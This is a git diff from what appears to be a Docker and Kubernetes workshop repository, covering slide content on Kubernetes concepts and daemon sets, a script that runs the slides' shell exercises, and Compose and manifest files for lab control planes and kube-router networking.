If there is a bug and you can't even reproduce it:
|
||||
sorry. It is probably an Heisenbug. I can't act on it
|
||||
until it's reproducible.
|
||||
sorry. It is probably an Heisenbug. We can't act on it
|
||||
until it's reproducible, alas.
|
||||
|
||||
if you have attended this workshop and have feedback,
|
||||
or if you want us to deliver that workshop at your
|
||||
conference or for your company: contact me (jerome
|
||||
at docker dot com).
|
||||
|
||||
Thank you!
|
||||
# “Please teach us!”
|
||||
|
||||
If you have attended one of these workshops, and want
|
||||
your team or organization to attend a similar one, you
|
||||
can look at the list of upcoming events on
|
||||
http://container.training/.
|
||||
|
||||
You are also welcome to reuse these materials to run
|
||||
your own workshop, for your team or even at a meetup
|
||||
or conference. In that case, you might enjoy watching
|
||||
[Bridget Kromhout's talk at KubeCon 2018 Europe](
|
||||
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
|
||||
precisely how to run such a workshop yourself.
|
||||
|
||||
Finally, you can also contact the following persons,
|
||||
who are experienced speakers, are familiar with the
|
||||
material, and are available to deliver these workshops
|
||||
at your conference or for your company:
|
||||
|
||||
- jerome dot petazzoni at gmail dot com
|
||||
- bret at bretfisher dot com
|
||||
|
||||
(If you are willing and able to deliver such workshops,
|
||||
feel free to submit a PR to add your name to that list!)
|
||||
|
||||
**Thank you!**
|
||||
|
||||
|
||||
@@ -1,191 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import re
|
||||
import signal
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
def print_snippet(snippet):
|
||||
print(78*'-')
|
||||
print(snippet)
|
||||
print(78*'-')
|
||||
|
||||
class Snippet(object):
|
||||
|
||||
def __init__(self, slide, content):
|
||||
self.slide = slide
|
||||
self.content = content
|
||||
self.actions = []
|
||||
|
||||
def __str__(self):
|
||||
return self.content
|
||||
|
||||
|
||||
class Slide(object):
|
||||
|
||||
current_slide = 0
|
||||
|
||||
def __init__(self, content):
|
||||
Slide.current_slide += 1
|
||||
self.number = Slide.current_slide
|
||||
# Remove commented-out slides
|
||||
# (remark.js considers ??? to be the separator for speaker notes)
|
||||
content = re.split("\n\?\?\?\n", content)[0]
|
||||
self.content = content
|
||||
self.snippets = []
|
||||
exercises = re.findall("\.exercise\[(.*)\]", content, re.DOTALL)
|
||||
for exercise in exercises:
|
||||
if "```" in exercise and "<br/>`" in exercise:
|
||||
print("! Exercise on slide {} has both ``` and <br/>` delimiters, skipping."
|
||||
.format(self.number))
|
||||
print_snippet(exercise)
|
||||
elif "```" in exercise:
|
||||
for snippet in exercise.split("```")[1::2]:
|
||||
self.snippets.append(Snippet(self, snippet))
|
||||
elif "<br/>`" in exercise:
|
||||
for snippet in re.findall("<br/>`(.*)`", exercise):
|
||||
self.snippets.append(Snippet(self, snippet))
|
||||
else:
|
||||
print(" Exercise on slide {} has neither ``` or <br/>` delimiters, skipping."
|
||||
.format(self.number))
|
||||
|
||||
def __str__(self):
|
||||
text = self.content
|
||||
for snippet in self.snippets:
|
||||
text = text.replace(snippet.content, ansi("7")(snippet.content))
|
||||
return text
|
||||
|
||||
|
||||
def ansi(code):
|
||||
return lambda s: "\x1b[{}m{}\x1b[0m".format(code, s)
|
||||
|
||||
slides = []
|
||||
with open("index.html") as f:
|
||||
content = f.read()
|
||||
for slide in re.split("\n---?\n", content):
|
||||
slides.append(Slide(slide))
|
||||
|
||||
is_editing_file = False
|
||||
placeholders = {}
|
||||
for slide in slides:
|
||||
for snippet in slide.snippets:
|
||||
content = snippet.content
|
||||
# Multi-line snippets should be ```highlightsyntax...
|
||||
# Single-line snippets will be interpreted as shell commands
|
||||
if '\n' in content:
|
||||
highlight, content = content.split('\n', 1)
|
||||
else:
|
||||
highlight = "bash"
|
||||
content = content.strip()
|
||||
# If the previous snippet was a file fragment, and the current
|
||||
# snippet is not YAML or EDIT, complain.
|
||||
if is_editing_file and highlight not in ["yaml", "edit"]:
|
||||
print("! On slide {}, previous snippet was YAML, so what do what do?"
|
||||
.format(slide.number))
|
||||
print_snippet(content)
|
||||
is_editing_file = False
|
||||
if highlight == "yaml":
|
||||
is_editing_file = True
|
||||
elif highlight == "placeholder":
|
||||
for line in content.split('\n'):
|
||||
variable, value = line.split(' ', 1)
|
||||
placeholders[variable] = value
|
||||
elif highlight == "bash":
|
||||
for variable, value in placeholders.items():
|
||||
quoted = "`{}`".format(variable)
|
||||
if quoted in content:
|
||||
content = content.replace(quoted, value)
|
||||
del placeholders[variable]
|
||||
if '`' in content:
|
||||
print("! The following snippet on slide {} contains a backtick:"
|
||||
.format(slide.number))
|
||||
print_snippet(content)
|
||||
continue
|
||||
print("_ "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
elif highlight == "edit":
|
||||
print(". "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
elif highlight == "meta":
|
||||
print("^ "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
else:
|
||||
print("! Unknown highlight {!r} on slide {}.".format(highlight, slide.number))
|
||||
if placeholders:
|
||||
print("! Remaining placeholder values: {}".format(placeholders))
|
||||
|
||||
actions = sum([snippet.actions for snippet in sum([slide.snippets for slide in slides], [])], [])
|
||||
|
||||
# Strip ^{ ... ^} for now
|
||||
def strip_curly_braces(actions, in_braces=False):
|
||||
if actions == []:
|
||||
return []
|
||||
elif actions[0] == ("meta", "^{"):
|
||||
return strip_curly_braces(actions[1:], True)
|
||||
elif actions[0] == ("meta", "^}"):
|
||||
return strip_curly_braces(actions[1:], False)
|
||||
elif in_braces:
|
||||
return strip_curly_braces(actions[1:], True)
|
||||
else:
|
||||
return [actions[0]] + strip_curly_braces(actions[1:], False)
|
||||
|
||||
actions = strip_curly_braces(actions)
|
||||
|
||||
background = []
|
||||
cwd = os.path.expanduser("~")
|
||||
env = {}
|
||||
for current_action, next_action in zip(actions, actions[1:]+[("bash", "true")]):
|
||||
if current_action[0] == "meta":
|
||||
continue
|
||||
print(ansi(7)(">>> {}".format(current_action[1])))
|
||||
time.sleep(1)
|
||||
popen_options = dict(shell=True, cwd=cwd, stdin=subprocess.PIPE, preexec_fn=os.setpgrp)
|
||||
# The follow hack allows to capture the environment variables set by `docker-machine env`
|
||||
# FIXME: this doesn't handle `unset` for now
|
||||
if any([
|
||||
"eval $(docker-machine env" in current_action[1],
|
||||
"DOCKER_HOST" in current_action[1],
|
||||
"COMPOSE_FILE" in current_action[1],
|
||||
]):
|
||||
popen_options["stdout"] = subprocess.PIPE
|
||||
current_action[1] += "\nenv"
|
||||
proc = subprocess.Popen(current_action[1], **popen_options)
|
||||
proc.cmd = current_action[1]
|
||||
if next_action[0] == "meta":
|
||||
print(">>> {}".format(next_action[1]))
|
||||
time.sleep(3)
|
||||
if next_action[1] == "^C":
|
||||
os.killpg(proc.pid, signal.SIGINT)
|
||||
proc.wait()
|
||||
elif next_action[1] == "^Z":
|
||||
# Let the process run
|
||||
background.append(proc)
|
||||
elif next_action[1] == "^D":
|
||||
proc.communicate()
|
||||
proc.wait()
|
||||
else:
|
||||
print("! Unknown meta action {} after snippet:".format(next_action[1]))
|
||||
print_snippet(next_action[1])
|
||||
print(ansi(7)("<<< {}".format(current_action[1])))
|
||||
else:
|
||||
proc.wait()
|
||||
if "stdout" in popen_options:
|
||||
stdout, stderr = proc.communicate()
|
||||
for line in stdout.split('\n'):
|
||||
if line.startswith("DOCKER_"):
|
||||
variable, value = line.split('=', 1)
|
||||
env[variable] = value
|
||||
print("=== {}={}".format(variable, value))
|
||||
print(ansi(7)("<<< {} >>> {}".format(proc.returncode, current_action[1])))
|
||||
if proc.returncode != 0:
|
||||
print("Got non-zero status code; aborting.")
|
||||
break
|
||||
if current_action[1].startswith("cd "):
|
||||
cwd = os.path.expanduser(current_action[1][3:])
|
||||
for proc in background:
|
||||
print("Terminating background process:")
|
||||
print_snippet(proc.cmd)
|
||||
proc.terminate()
|
||||
proc.wait()
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
../www/htdocs/index.html
|
||||
9
compose/frr-route-reflector/conf/bgpd.conf
Normal file
9
compose/frr-route-reflector/conf/bgpd.conf
Normal file
@@ -0,0 +1,9 @@
|
||||
hostname frr
|
||||
router bgp 64512
|
||||
network 1.0.0.2/32
|
||||
bgp log-neighbor-changes
|
||||
neighbor kube peer-group
|
||||
neighbor kube remote-as 64512
|
||||
neighbor kube route-reflector-client
|
||||
bgp listen range 0.0.0.0/0 peer-group kube
|
||||
log stdout
|
||||
0
compose/frr-route-reflector/conf/vtysh.conf
Normal file
0
compose/frr-route-reflector/conf/vtysh.conf
Normal file
2
compose/frr-route-reflector/conf/zebra.conf
Normal file
2
compose/frr-route-reflector/conf/zebra.conf
Normal file
@@ -0,0 +1,2 @@
|
||||
hostname frr
|
||||
log stdout
|
||||
34
compose/frr-route-reflector/docker-compose.yaml
Normal file
34
compose/frr-route-reflector/docker-compose.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
bgpd:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
|
||||
restart: always
|
||||
|
||||
zebra:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
|
||||
restart: always
|
||||
|
||||
vtysh:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: vtysh -c "show ip bgp"
|
||||
|
||||
chmod:
|
||||
image: alpine
|
||||
volumes:
|
||||
- ./run:/var/run/frr
|
||||
command: chmod 777 /var/run/frr
|
||||
29
compose/kube-router-k8s-control-plane/docker-compose.yaml
Normal file
29
compose/kube-router-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.4.3
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
|
||||
"Edit the CLUSTER placeholder first. Then, remove this line.":
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
128
compose/kube-router-k8s-control-plane/kuberouter.yaml
Normal file
128
compose/kube-router-k8s-control-plane/kuberouter.yaml
Normal file
@@ -0,0 +1,128 @@
|
||||
---
|
||||
apiVersion: |+
|
||||
|
||||
|
||||
Make sure you update the line with --master=http://X.X.X.X:8080 below.
|
||||
Then remove this section from this YAML file and try again.
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: kube-router-cfg
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
data:
|
||||
cni-conf.json: |
|
||||
{
|
||||
"cniVersion":"0.3.0",
|
||||
"name":"mynet",
|
||||
"plugins":[
|
||||
{
|
||||
"name":"kubernetes",
|
||||
"type":"bridge",
|
||||
"bridge":"kube-bridge",
|
||||
"isDefaultGateway":true,
|
||||
"ipam":{
|
||||
"type":"host-local"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
name: kube-router
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kube-router
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ''
|
||||
spec:
|
||||
serviceAccountName: kube-router
|
||||
containers:
|
||||
- name: kube-router
|
||||
image: docker.io/cloudnativelabs/kube-router
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
- "--run-router=true"
|
||||
- "--run-firewall=true"
|
||||
- "--run-service-proxy=true"
|
||||
- "--master=http://X.X.X.X:8080"
|
||||
env:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
- name: KUBE_ROUTER_CNI_CONF_FILE
|
||||
value: /etc/cni/net.d/10-kuberouter.conflist
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /healthz
|
||||
port: 20244
|
||||
initialDelaySeconds: 10
|
||||
periodSeconds: 3
|
||||
resources:
|
||||
requests:
|
||||
cpu: 250m
|
||||
memory: 250Mi
|
||||
securityContext:
|
||||
privileged: true
|
||||
volumeMounts:
|
||||
- name: lib-modules
|
||||
mountPath: /lib/modules
|
||||
readOnly: true
|
||||
- name: cni-conf-dir
|
||||
mountPath: /etc/cni/net.d
|
||||
initContainers:
|
||||
- name: install-cni
|
||||
image: busybox
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- set -e -x;
|
||||
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
|
||||
if [ -f /etc/cni/net.d/*.conf ]; then
|
||||
rm -f /etc/cni/net.d/*.conf;
|
||||
fi;
|
||||
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
|
||||
cp /etc/kube-router/cni-conf.json ${TMP};
|
||||
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
|
||||
fi
|
||||
volumeMounts:
|
||||
- mountPath: /etc/cni/net.d
|
||||
name: cni-conf-dir
|
||||
- mountPath: /etc/kube-router
|
||||
name: kube-router-cfg
|
||||
hostNetwork: true
|
||||
tolerations:
|
||||
- key: CriticalAddonsOnly
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node-role.kubernetes.io/master
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node.kubernetes.io/not-ready
|
||||
operator: Exists
|
||||
volumes:
|
||||
- name: lib-modules
|
||||
hostPath:
|
||||
path: /lib/modules
|
||||
- name: cni-conf-dir
|
||||
hostPath:
|
||||
path: /etc/cni/net.d
|
||||
- name: kube-router-cfg
|
||||
configMap:
|
||||
name: kube-router-cfg
|
||||
|
||||
28
compose/simple-k8s-control-plane/docker-compose.yaml
Normal file
28
compose/simple-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.4.3
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-controller-manager --master http://localhost:8080
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
@@ -5,6 +5,3 @@ RUN gem install thin
|
||||
ADD hasher.rb /
|
||||
CMD ["ruby", "hasher.rb"]
|
||||
EXPOSE 80
|
||||
HEALTHCHECK \
|
||||
--interval=1s --timeout=2s --retries=3 --start-period=1s \
|
||||
CMD curl http://localhost/ || exit 1
|
||||
|
||||
@@ -28,5 +28,5 @@ def rng(how_many_bytes):
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
app.run(host="0.0.0.0", port=80)
|
||||
app.run(host="0.0.0.0", port=80, threaded=False)
|
||||
|
||||
|
||||
@@ -1,9 +0,0 @@
|
||||
<html>
|
||||
<!-- Generated with index.html.sh -->
|
||||
<head>
|
||||
<meta http-equiv="refresh" content="0; URL='https://dockercommunity.slack.com/messages/docker-mentor'" />
|
||||
</head>
|
||||
<body>
|
||||
<a href="https://dockercommunity.slack.com/messages/docker-mentor">https://dockercommunity.slack.com/messages/docker-mentor</a>
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,16 +0,0 @@
|
||||
#!/bin/sh
|
||||
#LINK=https://gitter.im/jpetazzo/workshop-20170322-sanjose
|
||||
LINK=https://dockercommunity.slack.com/messages/docker-mentor
|
||||
#LINK=https://usenix-lisa.slack.com/messages/docker
|
||||
sed "s,@@LINK@@,$LINK,g" >index.html <<EOF
|
||||
<html>
|
||||
<!-- Generated with index.html.sh -->
|
||||
<head>
|
||||
<meta http-equiv="refresh" content="0; URL='$LINK'" />
|
||||
</head>
|
||||
<body>
|
||||
<a href="$LINK">$LINK</a>
|
||||
</body>
|
||||
</html>
|
||||
EOF
|
||||
|
||||
@@ -1,283 +0,0 @@
|
||||
# Kubernetes concepts
|
||||
|
||||
- Kubernetes is a container management system
|
||||
|
||||
- It runs and manages containerized applications on a cluster
|
||||
|
||||
--
|
||||
|
||||
- What does that really mean?
|
||||
|
||||
---
|
||||
|
||||
## Basic things we can ask Kubernetes to do
|
||||
|
||||
--
|
||||
|
||||
- Start 5 containers using image `atseashop/api:v1.3`
|
||||
|
||||
--
|
||||
|
||||
- Place an internal load balancer in front of these containers
|
||||
|
||||
--
|
||||
|
||||
- Start 10 containers using image `atseashop/webfront:v1.3`
|
||||
|
||||
--
|
||||
|
||||
- Place a public load balancer in front of these containers
|
||||
|
||||
--
|
||||
|
||||
- It's Black Friday (or Christmas), traffic spikes, grow our cluster and add containers
|
||||
|
||||
--
|
||||
|
||||
- New release! Replace my containers with the new image `atseashop/webfront:v1.4`
|
||||
|
||||
--
|
||||
|
||||
- Keep processing requests during the upgrade; update my containers one at a time
|
||||
|
||||
---
|
||||
|
||||
## Other things that Kubernetes can do for us
|
||||
|
||||
- Basic autoscaling
|
||||
|
||||
- Blue/green deployment, canary deployment
|
||||
|
||||
- Long running services, but also batch (one-off) jobs
|
||||
|
||||
- Overcommit our cluster and *evict* low-priority jobs
|
||||
|
||||
- Run services with *stateful* data (databases etc.)
|
||||
|
||||
- Fine-grained access control defining *what* can be done by *whom* on *which* resources
|
||||
|
||||
- Integrating third party services (*service catalog*)
|
||||
|
||||
- Automating complex tasks (*operators*)
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes architecture
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## Kubernetes architecture
|
||||
|
||||
- Ha ha ha ha
|
||||
|
||||
- OK, I was trying to scare you, it's much simpler than that ❤️
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## Credits
|
||||
|
||||
- The first schema is a Kubernetes cluster with storage backed by multi-path iSCSI
|
||||
|
||||
(Courtesy of [Yongbok Kim](https://www.yongbok.net/blog/))
|
||||
|
||||
- The second one is an good simplified representation of a Kubernetes cluster
|
||||
|
||||
(Courtesy of [Imesh Gunaratne](https://medium.com/containermind/a-reference-architecture-for-deploying-wso2-middleware-on-kubernetes-d4dee7601e8e))
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes architecture: the master
|
||||
|
||||
- The Kubernetes logic (its "brains") is a collection of services:
|
||||
|
||||
- the API server (our point of entry to everything!)
|
||||
- core services like the scheduler and controller manager
|
||||
- `etcd` (a highly available key/value store; the "database" of Kubernetes)
|
||||
|
||||
- Together, these services form what is called the "master"
|
||||
|
||||
- These services can run straight on a host, or in containers
|
||||
<br/>
|
||||
(that's an implementation detail)
|
||||
|
||||
- `etcd` can be run on separate machines (first schema) or co-located (second schema)
|
||||
|
||||
- We need at least one master, but we can have more (for high availability)
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes architecture: the nodes
|
||||
|
||||
- The nodes executing our containers run another collection of services:
|
||||
|
||||
- a container Engine (typically Docker)
|
||||
- kubelet (the "node agent")
|
||||
- kube-proxy (a necessary but not sufficient network component)
|
||||
|
||||
- Nodes were formerly called "minions"
|
||||
|
||||
- It is customary to *not* run apps on the node(s) running master components
|
||||
|
||||
(Except when using small development clusters)
|
||||
|
||||
---
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
No!
|
||||
|
||||
--
|
||||
|
||||
- By default, Kubernetes uses the Docker Engine to run containers
|
||||
|
||||
- We could also use `rkt` ("Rocket") from CoreOS
|
||||
|
||||
- Or leverage other pluggable runtimes through the *Container Runtime Interface*
|
||||
|
||||
(like CRI-O, or containerd)
|
||||
|
||||
---
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
Yes!
|
||||
|
||||
--
|
||||
|
||||
- In this workshop, we run our app on a single node first
|
||||
|
||||
- We will need to build images and ship them around
|
||||
|
||||
- We can do these things without Docker
|
||||
<br/>
|
||||
(and get diagnosed with NIH¹ syndrome)
|
||||
|
||||
- Docker is still the most stable container engine today
|
||||
<br/>
|
||||
(but other options are maturing very quickly)
|
||||
|
||||
.footnote[¹[Not Invented Here](https://en.wikipedia.org/wiki/Not_invented_here)]
|
||||
|
||||
---
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
- On our development environments, CI pipelines ... :
|
||||
|
||||
*Yes, almost certainly*
|
||||
|
||||
- On our production servers:
|
||||
|
||||
*Yes (today)*
|
||||
|
||||
*Probably not (in the future)*
|
||||
|
||||
.footnote[More information about CRI [on the Kubernetes blog](http://blog.kubernetes.io/2016/12/]container-runtime-interface-cri-in-kubernetes.html).
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes resources
|
||||
|
||||
- The Kubernetes API defines a lot of objects called *resources*
|
||||
|
||||
- These resources are organized by type, or `Kind` (in the API)
|
||||
|
||||
- A few common resource types are:
|
||||
|
||||
- node (self-explanatory)
|
||||
- pod (group of containers running together on a node)
|
||||
- service (stable network endpoint to connect to one or multiple containers)
|
||||
- namespace (more-or-less isolated group of things)
|
||||
- secret (bundle of sensitive data to be passed to a container)
|
||||
|
||||
And much more! (We can see the full list by running `kubectl get`)
|
||||
|
||||
---
|
||||
|
||||
# Declarative vs imperative
|
||||
|
||||
- Kubernetes puts a very strong emphasis on being *declarative*
|
||||
|
||||
- Declarative:
|
||||
|
||||
*I want a cup of tea. Make it happen.*
|
||||
|
||||
- Imperative:
|
||||
|
||||
*Boil some water. Pour it in a teapot. Add tea leaves. Steep for a while. Serve in cup.*
|
||||
|
||||
--
|
||||
|
||||
- Declarative seems simpler at first ...
|
||||
|
||||
--
|
||||
|
||||
- ... As long as you know how to brew tea
|
||||
|
||||
---
|
||||
|
||||
## Declarative vs imperative
|
||||
|
||||
- What declarative would really be:
|
||||
|
||||
*I want a cup of tea, obtained by pouring an infusion¹ of tea leaves in a cup.*
|
||||
|
||||
--
|
||||
|
||||
*¹An infusion is obtained by letting the object steep a few minutes in hot² water.*
|
||||
|
||||
--
|
||||
|
||||
*²Hot liquid is obtained by pouring it in an appropriate container³ and setting it on a stove.*
|
||||
|
||||
--
|
||||
|
||||
*³Ah, finally, containers! Something we know about. Let's get to work, shall we?*
|
||||
|
||||
---
|
||||
|
||||
## Declarative vs imperative
|
||||
|
||||
- Imperative systems:
|
||||
|
||||
- simpler
|
||||
|
||||
- if a task is interrupted, we have to restart from scratch
|
||||
|
||||
- Declarative systems:
|
||||
|
||||
- if a task is interrupted (or if we show up to the party half-way through),
|
||||
we can figure out what's missing and do only what's necessary
|
||||
|
||||
- we need to be able to *observe* the system
|
||||
|
||||
- ... and compute a "diff" between *what we have* and *what we want*
|
||||
|
||||
---
|
||||
|
||||
## Declarative vs imperative in Kubernetes
|
||||
|
||||
- Virtually everything we create in Kubernetes is created from a *spec*
|
||||
|
||||
- Watch for the `spec` fields in the YAML files later!
|
||||
|
||||
- The *spec* describes *how we want the thing to be*
|
||||
|
||||
- Kubernetes will *reconcile* the current state with the spec
|
||||
<br/>(technically, this is done by a number of *controllers*)
|
||||
|
||||
- When we want to change some resource, we update the *spec*
|
||||
|
||||
- Kubernetes will then *converge* that resource
|
||||
@@ -1,371 +0,0 @@
|
||||
# Daemon sets
|
||||
|
||||
- Remember: we did all that cluster orchestration business for `rng`
|
||||
|
||||
- We want one (and exactly one) instance of `rng` per node
|
||||
|
||||
- If we just scale `deploy/rng` to 4, nothing guarantees that they spread
|
||||
|
||||
- Instead of a `deployment`, we will use a `daemonset`
|
||||
|
||||
- Daemon sets are great for cluster-wide, per-node processes:
|
||||
|
||||
- `kube-proxy`
|
||||
- `weave` (our overlay network)
|
||||
- monitoring agents
|
||||
- hardware management tools (e.g. SCSI/FC HBA agents)
|
||||
- etc.
|
||||
|
||||
- They can also be restricted to run [only on some nodes](https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/#running-pods-on-only-some-nodes)
|
||||
|
||||
---
|
||||
|
||||
## Creating a daemon set
|
||||
|
||||
- Unfortunately, as of Kubernetes 1.8, the CLI cannot create daemon sets
|
||||
|
||||
--
|
||||
|
||||
- More precisely: it doesn't have a subcommand to create a daemon set
|
||||
|
||||
--
|
||||
|
||||
- But any kind of resource can always be created by providing a YAML description:
|
||||
```bash
|
||||
kubectl apply -f foo.yaml
|
||||
```
|
||||
|
||||
--
|
||||
|
||||
- How do we create the YAML file for our daemon set?
|
||||
|
||||
--
|
||||
|
||||
- option 1: read the docs
|
||||
|
||||
--
|
||||
|
||||
- option 2: `vi` our way out of it
|
||||
|
||||
---
|
||||
|
||||
## Creating the YAML file for our daemon set
|
||||
|
||||
- Let's start with the YAML file for the current `rng` resource
|
||||
|
||||
.exercise[
|
||||
|
||||
- Dump the `rng` resource in YAML:
|
||||
```bash
|
||||
kubectl get deploy/rng -o yaml --export >rng.yml
|
||||
```
|
||||
|
||||
- Edit `rng.yml`
|
||||
|
||||
]
|
||||
|
||||
Note: `--export` will remove "cluster-specific" information, i.e.:
|
||||
- namespace (so that the resource is not tied to a specific namespace)
|
||||
- status and creation timestamp (useless when creating a new resource)
|
||||
- resourceVersion and uid (these would cause... *interesting* problems)
|
||||
|
||||
---
|
||||
|
||||
## "Casting" a resource to another
|
||||
|
||||
- What if we just changed the `kind` field?
|
||||
|
||||
(It can't be that easy, right?)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Change `kind: Deployment` to `kind: DaemonSet`
|
||||
|
||||
- Save, quit
|
||||
|
||||
- Try to create our new resource:
|
||||
```bash
|
||||
kubectl apply -f rng.yml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
We all knew this couldn't be that easy, right!
|
||||
|
||||
---
|
||||
|
||||
## Understanding the problem
|
||||
|
||||
- The core of the error is:
|
||||
```
|
||||
error validating data:
|
||||
[ValidationError(DaemonSet.spec):
|
||||
unknown field "replicas" in io.k8s.api.extensions.v1beta1.DaemonSetSpec,
|
||||
...
|
||||
```
|
||||
|
||||
--
|
||||
|
||||
- *Obviously,* it doesn't make sense to specify a number of replicas for a daemon set
|
||||
|
||||
--
|
||||
|
||||
- Workaround: fix the YAML
|
||||
|
||||
- remove the `replicas` field
|
||||
- remove the `strategy` field (which defines the rollout mechanism for a deployment)
|
||||
- remove the `status: {}` line at the end
|
||||
|
||||
--
|
||||
|
||||
- Or, we could also ...
|
||||
|
||||
---
|
||||
|
||||
## Use the `--force`, Luke
|
||||
|
||||
- We could also tell Kubernetes to ignore these errors and try anyway
|
||||
|
||||
- The `--force` flag actual name is `--validate=false`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to load our YAML file and ignore errors:
|
||||
```bash
|
||||
kubectl apply -f rng.yml --validate=false
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
Wait ... Now, can it be *that* easy?
|
||||
|
||||
---
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- Did we transform our `deployment` into a `daemonset`?
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look at the resources that we have now:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
We have both `deploy/rng` and `ds/rng` now!
|
||||
|
||||
--
|
||||
|
||||
And one too many pod ...
|
||||
|
||||
---
|
||||
|
||||
## Explanation
|
||||
|
||||
- You can have different resource types with the same name
|
||||
|
||||
(i.e. a *deployment* and a *daemonset* both named `rng`)
|
||||
|
||||
- We still have the old `rng` *deployment*
|
||||
|
||||
- But now we have the new `rng` *daemonset* as well
|
||||
|
||||
- If we look at the pods, we have:
|
||||
|
||||
- *one pod* for the deployment
|
||||
|
||||
- *one pod per node* for the daemonset
|
||||
|
||||
---
|
||||
|
||||
## What are all these pods doing?
|
||||
|
||||
- Let's check the logs of all these `rng` pods
|
||||
|
||||
- All these pods have a `run=rng` label:
|
||||
|
||||
- the first pod, because that's what `kubectl run` does
|
||||
- the other ones (in the daemon set), because we
|
||||
